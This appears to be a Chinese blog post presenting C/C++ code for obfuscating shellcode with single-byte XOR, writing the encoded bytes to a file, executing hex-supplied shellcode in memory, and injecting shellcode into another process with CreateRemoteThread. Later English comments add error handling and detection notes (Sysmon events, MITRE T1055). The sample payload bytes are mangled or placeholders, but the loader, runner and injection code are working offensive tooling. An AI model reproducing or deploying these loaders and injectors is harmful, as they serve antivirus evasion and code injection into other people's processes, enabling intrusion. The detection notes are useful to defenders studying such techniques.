C/C++ ShellCode 常用加密方式

2022-12-28 17:26:25 浏览数 (2)

异或加密ShellCode:

#include <stdio.h>
#include <Windows.h>

/*
 * Sample input for the XOR demo below.
 * NOTE(review): as written this literal is plain ASCII text ('x', 'b', 'a', ...),
 * not raw bytes; the "\x" escape prefixes were presumably lost when the page
 * was extracted -- confirm against the original post.
 */
unsigned char buf[] = "xbaxa9xb0x07x68xddxc3xd9x74x24xf4x5ex31xc9xb1";

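int main(int argc, char* argv[])
{
	/*
	 * XOR round-trip demo: encode buf with a fixed key, print the result,
	 * then decode it again and print the recovered bytes.
	 *
	 * The results are stored in unsigned char, so only the low 8 bits of
	 * `password` ever take part: 1025 & 0xFF == 0x01. This is a single-byte
	 * XOR, i.e. an encoding rather than encryption. There are only 255
	 * non-trivial keys, so a scanner recovers the original bytes by simply
	 * trying them all.
	 */
	const int password = 1025;
	const unsigned char key = (unsigned char)password; /* effective key: 0x01 */
	unsigned char enShellCode[500];
	unsigned char deShellCode[500];
	int nLen = sizeof(buf)-1; /* drop the string literal's terminating NUL */

	/* The work buffers are fixed-size; refuse input that would overflow them. */
	if (nLen > (int)sizeof(enShellCode))
	{
		fprintf(stderr, "input is %d bytes, buffers hold %d\n",
			nLen, (int)sizeof(enShellCode));
		return 1;
	}

	for (int i = 0; i < nLen; i++)
	{
		enShellCode[i] = buf[i] ^ key;
		/* %02x keeps every byte two digits wide so the output is unambiguous. */
		printf("\\x%02x", enShellCode[i]);
	}

	printf("\n");

	/* XOR is its own inverse: applying the same key restores the input. */
	for (int i = 0; i < nLen; i++)
	{
		deShellCode[i] = enShellCode[i] ^ key;
		printf("\\x%02x", deShellCode[i]);
	}

	printf("\n");

	system("pause");
	return 0;
}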

另一种ShellCode加密方式

#include <stdio.h>
#include <Windows.h>

/*
 * Sample input handed to encoder().
 * NOTE(review): as written this literal is plain ASCII text, not raw bytes;
 * the "\x" escape prefixes were presumably lost when the page was extracted --
 * confirm against the original post.
 */
char ShellCode[] = "xFCx68x6Ax0Ax38x1Ex68x63x89xD1x4Fx68x32x74x91x0C";

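/*
 * XOR every byte of `input` with the single-byte `key`, write the result to
 * "shellcode.raw" as a C string literal ("\x.." escapes, 16 bytes per line),
 * and print the same bytes to stdout as space-separated hex.
 *
 * input: NUL-terminated buffer. Its length is taken with strlen(), so a
 *        buffer that contains a 0x00 byte is silently cut short at that byte.
 * key:   one byte. Callers passing a wider constant get it reduced modulo 256.
 *
 * Single-byte XOR is an encoding, not encryption: with 255 non-trivial keys
 * the original bytes are recovered by exhaustive search.
 *
 * On allocation or file-open failure the function reports the error and
 * returns without producing output.
 */
void encoder(char* input, unsigned char key)
{
	size_t i = 0, len = 0;
	FILE * fp;
	unsigned char * output;

	if (input == NULL)
		return;

	len = strlen(input);
	output = malloc(len + 1);
	if (output == NULL)
	{
		perror("malloc");
		return;
	}

	for (i = 0; i < len; i++)
		output[i] = (unsigned char)input[i] ^ key;

	fp = fopen("shellcode.raw", "w+");
	if (fp == NULL)
	{
		perror("shellcode.raw");
		free(output);
		return;
	}

	fprintf(fp, "\"");
	for (i = 0; i < len; i++)
	{
		fprintf(fp, "\\x%02x", output[i]);
		/* Close the literal and open a new one every 16 bytes. */
		if ((i + 1) % 16 == 0)
			fprintf(fp, "\"\n\"");
	}
	fprintf(fp, "\";");
	fclose(fp);

	/* Print the encoded bytes, 16 per row. */
	for (i = 0; i < len; i++)
	{
		printf("%02x ", output[i]);
		if ((i + 1) % 16 == 0)
		{
			printf("\n");
		}
	}
	free(output);
}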

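int main(int argc,char *argv[])
{
	/*
	 * encoder() takes the key as an unsigned char. The constant 1233 used
	 * here originally does not fit in one byte and was implicitly reduced to
	 * 1233 % 256 == 0xD1, so the effective key is spelled out instead of
	 * relying on a silent narrowing conversion.
	 */
	encoder(ShellCode, 0xD1);

	system("pause");
	return 0;
}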

ShellCode代码执行盒

#include <stdio.h>
#include <Windows.h>

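int main(int argc, char *argv[])
{
	/*
	 * Test harness: decodes the hex string in argv[1] in place, copies the
	 * bytes into a fresh private region, marks that region executable and
	 * calls it.
	 *
	 * Detection note: a private (not image-backed) region that is written
	 * and then switched to an executable protection in the same process is
	 * what memory scanners and EDR hooks on VirtualProtect look for.
	 */
	if (argc < 2 || argv[1] == NULL)
	{
		fprintf(stderr, "usage: %s <hex-bytes>\n", argc > 0 ? argv[0] : "runner");
		return 1;
	}

	char *shellcode = argv[1];
	size_t hex_len = strlen(shellcode);

	/* Two hex digits per byte: reject empty or odd-length input up front. */
	if (hex_len == 0 || hex_len % 2 != 0)
	{
		fprintf(stderr, "input must be a non-empty, even-length hex string\n");
		return 1;
	}

	size_t memory_allocation = hex_len / 2;

	/*
	 * Decode in place. The write index i never passes the read index 2*i,
	 * and the loop runs once per output byte. The original bound was the
	 * length of the hex text, which made sscanf read past the terminator.
	 */
	for (size_t i = 0; i < memory_allocation; i++)
	{
		unsigned int char_in_hex;

		if (sscanf(shellcode + 2 * i, "%2X", &char_in_hex) != 1)
		{
			fprintf(stderr, "invalid hex at offset %u\n", (unsigned int)(2 * i));
			return 1;
		}
		shellcode[i] = (char)char_in_hex;
	}

	void *exec = VirtualAlloc(0, memory_allocation, MEM_COMMIT, PAGE_READWRITE);
	if (exec == NULL)
	{
		fprintf(stderr, "VirtualAlloc failed: %lu\n", GetLastError());
		return 1;
	}

	memcpy(exec, shellcode, memory_allocation);

	DWORD ignore;
	if (!VirtualProtect(exec, memory_allocation, PAGE_EXECUTE, &ignore))
	{
		fprintf(stderr, "VirtualProtect failed: %lu\n", GetLastError());
		VirtualFree(exec, 0, MEM_RELEASE);
		return 1;
	}

	(*(void(*)()) exec)();

	return 0;
}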

ShellCode 进程注入

#include <stdio.h>
#include <windows.h>

/*
 * Placeholder only: the literal is descriptive text, not payload bytes.
 * sizeof(ShellCode) counts the string's terminating NUL as well.
 */
unsigned char ShellCode[] = "shellcode代码";

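/*
 * Copies the ShellCode array into the process identified by Pid and starts a
 * thread there at the copied bytes (classic remote-thread injection, MITRE
 * ATT&CK T1055).
 *
 * Pid: target process id.
 * Returns TRUE when every step succeeded, FALSE on the first failure. The
 * original had no return statement despite the BOOL return type and checked
 * none of the API results.
 *
 * Detection note: each step is individually observable -- a handle opened
 * with PROCESS_ALL_ACCESS (Sysmon Event ID 10, ProcessAccess), a remote
 * PAGE_EXECUTE_READWRITE allocation, a cross-process write, and a thread
 * created in another process (Sysmon Event ID 8, CreateRemoteThread) whose
 * start address lies in private memory not backed by a loaded image.
 */
BOOL InjectShellCode(int Pid)
{
	HANDLE Handle, remoteThread;
	PVOID remoteBuffer;
	BOOL ok = FALSE;

	Handle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, Pid);
	if (Handle == NULL)
		return FALSE;

	remoteBuffer = VirtualAllocEx(Handle, NULL, sizeof(ShellCode), (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);
	if (remoteBuffer == NULL)
		goto out;

	if (!WriteProcessMemory(Handle, remoteBuffer, ShellCode, sizeof(ShellCode), NULL))
		goto out_free;

	remoteThread = CreateRemoteThread(Handle, NULL, 0, (LPTHREAD_START_ROUTINE)remoteBuffer, NULL, 0, NULL);
	if (remoteThread == NULL)
		goto out_free;

	/* The thread handle was leaked in the original. */
	CloseHandle(remoteThread);
	ok = TRUE;
	goto out;

out_free:
	/* Nothing is running from the buffer on this path, so release it. */
	VirtualFreeEx(Handle, remoteBuffer, 0, MEM_RELEASE);
out:
	CloseHandle(Handle);
	return ok;
}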

int main(int argc, char *argv[])
{
	/*
	 * The target process id is hard-coded and the result of
	 * InjectShellCode() is not inspected; the program exits with 0 either way.
	 */
	const int target_pid = 1024;

	(void)InjectShellCode(target_pid);

	return 0;
}
